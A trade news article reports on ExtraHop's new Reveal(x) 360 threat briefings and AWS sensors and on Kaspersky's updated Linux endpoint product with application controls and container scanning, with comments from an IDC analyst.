Two product announcements on Tuesday — one from ExtraHop, the other from Kaspersky — indicate industry vendors are looking to add new features to their products so they function more effectively in hybrid cloud environments.
The new Reveal(x) 360 Threat Briefings from ExtraHop offer incident response reports so security teams can retroactively investigate critical CVEs and exploits. ExtraHop also introduced Reveal(x) 360 Ultra Sensors to Amazon Web Services (AWS) workloads, which promises SaaS-based detection, response, and forensic investigation capabilities.
Forensic data will also be made available to AWS customers via ExtraHop Packet Basics, a free packet capture product on the AWS Marketplace. According to a recent report from ESG Research, incident response teams need better threat detection and response efficacy, especially as it relates to advanced persistent threats that move laterally across hybrid networks over extended periods of time.
Frank Dickson, program vice president for security and trust at IDC, said ExtraHop has a long history of collecting and analyzing network data at line speed. The company’s ExtraHop Reveal(x) performs out-of-band analysis on a copy of network traffic received via port mirroring or terminal access point (TAP) aggregator.
“Elevating detection and response capabilities to IaaS facilitates investigations and delivers much-needed tools to address the hybrid cloud use cases,” Dickson said. “Our software, systems and data are in the cloud. Our detection and response capabilities thus also have to address cloud.”
On the Kaspersky front, as some of the vendor’s recent research shows, organizations need dedicated protection for Linux servers — no matter if they are on-premise or in the cloud. Advanced threats for Linux are just as severe as for other operating systems, with such servers often hosting critical applications or becoming a springboard for access to endpoints on Windows machines and iOS devices.
To combat these types of threats, the updated Kaspersky product has newly added application controls for Linux workloads. This promises to help companies prevent the launch of unauthorized or unknown — and potentially dangerous — executables.
Kaspersky Endpoint Security for Linux also aims to improve DevOps by scanning containers and images in more containerization environments. In addition to Docker, Kaspersky now supports Cri-O, Podman and runC.
Protecting Linux has been a hot button as of late as cybercriminals turn their attentions to softer, non-Windows targets, added IDC’s Dickson.
“Linux is not only important for cloud instances but many on-premises servers are Linux-based,” Dickson said. “Kaspersky’s new offering allows them to address two needs: hardening defenses for valuable and vulnerability on-premises servers and also extending protection to container-based Docker.”